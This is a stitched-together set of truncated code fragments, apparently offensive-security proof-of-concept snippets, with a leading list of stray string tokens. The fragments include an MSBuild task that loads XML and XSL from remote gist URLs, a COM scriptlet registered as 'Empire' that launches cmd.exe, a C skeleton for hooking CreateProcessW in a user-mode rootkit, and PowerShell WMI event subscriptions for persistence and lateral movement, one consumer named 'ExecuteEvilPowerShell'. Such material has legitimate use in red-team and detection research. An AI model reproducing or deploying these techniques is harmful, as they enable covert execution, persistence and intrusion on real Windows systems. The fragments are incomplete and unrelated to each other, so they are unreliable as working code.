```text
" </div>"
" })();\r\n"
" && "
" & "
" "
" ''The "
" (""
" (199"
" (200"
" (e.g."
```
```xml
<Project xmlns="http://schemas.microsoft.com/developer/msbuild/2003" ToolsVersion="4.0">
  <Target Name="Example">
    <ItemGroup>
      <XmlFiles Include="https://gist.githubusercontent.com/caseysmithrc/d6ef2fdffa6c054c6996b0f2fb7dd45d/raw/6ce40c15487d67df6771ff205de5ea8a8c6f29c0/customers.xml" />
    </ItemGroup>
    <PropertyGroup>
      <XslFile>https://gist.githubusercontent.com/caseysmithrc/d6ef2fdffa6c054c6996b0f2fb7dd45d/raw/48abcd2a9575e1e5db25596cbaa02f6066bbe9e2/script.xsl</XslFile>
    </PropertyGroup>
    <XslTransformation
      OutputPaths="output.%(XmlFiles.FileName).html"
```
```powershell
<#
.SYNOPSIS
This script demonstrates the ability to capture and tamper with Web sessions.
For secure sessions, this is done by dynamically writing certificates to match the requested domain.
This is only proof-of-concept, and should be used cautiously, to demonstrate the effects of such an attack.
Function: Interceptor
Author: Casey Smith, Twitter: @subTee
License: BSD 3-Clause
```
```c
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#ifdef _MSC_VER
#include <intrin.h> /* for rdtscp and clflush */
#pragma optimize("gt",on)
#else
#include <x86intrin.h> /* for rdtscp and clflush */
#endif
```
```c
#include <windows.h>
#include <stdio.h>

FARPROC fpCreateProcessW;
BYTE bSavedByte;

// Blog Post Here:
// https://0x00sec.org/t/user-mode-rootkits-iat-and-inline-hooking/1108
// tasklist | findstr explore.exe
```
```xml
<?XML version="1.0"?>
<scriptlet>
<registration
    progid="Empire"
    classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
    <!-- Proof Of Concept - Casey Smith @subTee -->
    <script language="JScript">
        <![CDATA[
            var r = new ActiveXObject("WScript.Shell").Run("cmd.exe");
```
```powershell
# Define the signature - i.e. __EventFilter
$EventFilterArgs = @{
    EventNamespace = 'root/cimv2'
    Name = 'LateralMovementEvent'
    Query = 'SELECT * FROM MSFT_WmiProvider_ExecMethodAsyncEvent_Pre WHERE ObjectPath="Win32_Process" AND MethodName="Create"'
    QueryLanguage = 'WQL'
}

$InstanceArgs = @{
    Namespace = 'root/subscription'
```
```powershell
# This code could be used to remotely enable and launch AT jobs regardless of the fact that AT is deprecated in Win8+.
$HKLM = [UInt32] 2147483650

# Check to see if EnableAt is set
$Result = Invoke-CimMethod -Namespace root/default -ClassName StdRegProv -MethodName GetDWORDValue -Arguments @{
    hDefKey = $HKLM
    sSubKeyName = 'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\Configuration'
    sValueName = 'EnableAt'
}
```
```powershell
# Step #1 - Prep payload
$Hive = 'HKLM'
$PayloadKey = 'SOFTWARE\PayloadKey'
$PayloadValue = 'PayloadValue'
$TimerName = 'PayloadTrigger'
$EventFilterName = 'TimerTrigger'
$EventConsumerName = 'ExecuteEvilPowerShell'

switch ($Hive) {
    'HKLM' { $HiveVal = [UInt32] 2147483650 }
```
```powershell
$EventFilterArgs = @{
    EventNamespace = 'root/cimv2'
    Name = 'DriveChanged'
    Query = 'SELECT * FROM Win32_VolumeChangeEvent'
    QueryLanguage = 'WQL'
}

$Filter = Set-WmiInstance -Namespace root/subscription -Class __EventFilter -Arguments $EventFilterArgs

$CommandLineConsumerArgs = @{
```